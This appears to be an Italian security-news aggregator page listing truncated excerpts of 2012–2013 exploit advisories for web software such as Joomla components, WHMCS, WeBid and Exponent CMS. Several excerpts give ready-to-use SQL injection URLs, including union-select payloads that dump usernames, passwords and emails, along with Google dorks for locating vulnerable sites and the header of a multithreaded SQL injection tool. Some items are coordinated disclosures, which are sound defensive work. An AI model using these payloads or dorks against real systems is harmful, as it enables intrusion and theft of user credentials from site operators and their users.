# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability # Author : Red Security TEAM # Date : 17/01/2012 # Risk : High # Software : http://extensions.joomla.org/extensions/communication/forum/13560 # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi] # # Example : # # 1. [Get Database Name] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a # 2. [Get Tables Name] #...
Leggi il seguito »
Joomla Discussions SQL Injection
Joomla Component com_s5clanroster Sql Injection Vulnerability
17 maggio 2013 - Fonte: http://www.mondounix.com
Joomla Component com_s5clanroster Sql Injection Vulnerability ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Dork : inurl:"com_s5clanroster" .:. Script : http://www.newone.org/s5-clan-roster-shape5-extensions #################################################################### ===[ Exploit ]=== Sql Injection: ============== www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql] www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users--...
Leggi il seguito »
Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection
16 maggio 2013 - Fonte: http://www.mondounix.com
Advisory ID: HTB23154 Product: Exponent CMS Vendor: Online Innovative Creations Vulnerable Version(s): 2.2.0 beta 3 and probably prior Tested Version: 2.2.0 beta 3 Vendor Notification: April 24, 2013 Vendor Patch: May 3, 2013 Public Disclosure: May 15, 2013 Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98] CVE References: CVE-2013-3294, CVE-2013-3295 Risk Level: High CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory...
Leggi il seguito »
WHMCS 4.5.2 SQL Injection
14 maggio 2013 - Fonte: http://www.mondounix.com
# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and perior versions should be affected too
# Tested on: Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Vulnerable Code Snippet :
LINE 582: function pdfInvoice($id)
LINE 583: {
LINE 686: if ($CONFIG['GroupSimilarLineItems'])
...
Leggi il seguito »
AlienVault OSSIM multiple SQL Injection vulnerabilities
9 maggio 2013 - Fonte: http://www.mondounix.com
RunRunLevel Web Security Research - AlienVault OSSIM multiple SQL Injection vulnerabilities
Vendor Website : http://www.alienvault.com
INDEX
---------------------------------------
1. Background
2. Description
3. Affected Products
4. Vulnerabilities
5. Solution
6. Credit
7. Disclosure Timeline
1. BACKGROUND
---------------------------------------
OSSIM by AlienVault is an Open Source Security Information and Event Management (SIEM) platform, comprising a
collection of tools designed to aid network administrator in computer security, intrusion detection and prevention.
(Wikipedia)
2. DESCRIPTION
---------------------------------------
The RunRunLevel Web...
Leggi il seguito »
Joomla DJ Classifieds Extension 2.0 SQL Injection
9 maggio 2013 - Fonte: http://www.mondounix.com
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection # Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/" # Date: 4/5/2013 # Exploit Author: Napsterakos # Vendor Homepage: http://design-joomla.eu # Software Link: - # Version: 2.0 # Tested on: Linux Link: http://server/joomla/index.php/dj-classifieds/ Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi] # Exploit-DB Note: # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0 # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1 Credits to: Greek Hacking Scene...
Leggi il seguito »
Craigslist Gold SQL Injection
9 maggio 2013 - Fonte: http://www.mondounix.com
# Exploit Title: Craigslist Clone Gold SQL injection Vulnerability # Date: 04/05/2013 # Author: Fallaga # Team: FaLLaGa Tunisian Hackers #Script url: http://www.scriptcopy.com/craigslist-clone-script/Craiglist-Gold-4444.html # Version: N/A # Tested on: Demo # CVE : () ############################################################ ####################### #########################[ EXPL0!T ]######################### http://exemple/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads-- #############################SwT 4 Ever########################## #################### @JaMbA !! GreeTz: Fallaga Team + all tunisian people...
Leggi il seguito »
Webid 1.0.6 File Disclosure / SQL Injection
9 maggio 2013 - Fonte: http://www.mondounix.com
# Title: Webid Blind SQL Injection / Local File Disclosure Vulnerability # Google Dork: intext:"Powered by WeBid" # Author: Ahmed Aboul-Ela # Contact: Ahmed.Aboul3la[at]gmail[dot]com # Vendor: http://www.webidsupport.com/ # Software Link: http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.0.6/WeBid-1.0.6.zip/download # Version: 1.0.6 (current latest release) and prior versions should be affected too # Tested on: Linux - About the Software: WeBid is an open-source auction script package. Although still in beta stages WeBid is one of the best open-source solutions for getting an auction site up and running quickly and cheaply. Written in the popular scripting language PHP and...
Leggi il seguito »
Speck CMS SQL Injection
4 maggio 2013 - Fonte: http://www.mondounix.com
Author: Jason Whelan
PacketStorm: exploitdev
Email: exploitdevj@gmail.com
Target Software: Speck CMS Framework, Latest
Vendor URL: http://www.speckcms.org/
Multiple SQL Injection Vulnerabilities
Examples:
portal/user.cfm:
<cfquery name="qUser" datasource="#request.speck.codb#">
SELECT * FROM spUsers WHERE username = '#url.username#'
</cfquery>
portal/group.cfm:
<cfquery name="qGroup" datasource="#request.speck.codb#">
SELECT * FROM spGroups WHERE groupname = '#url.groupname#'
</cfquery>
Many more exist in this CMS framework. Exploitation will depend on the use
of these files within the user's CMS.
...Leggi il seguito »
Multithreaded SQL Injector
2 maggio 2013 - Fonte: http://www.mondounix.com
<?php
/*************************************************************************
. __ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
--------------------------------------------------------------------------
* Multithreaded SQL Injector
* Coded by Miyachung
* Miyachung@hotmail.com
* Special Thanks burtay
* Janissaries.Org
*...
Leggi il seguito »
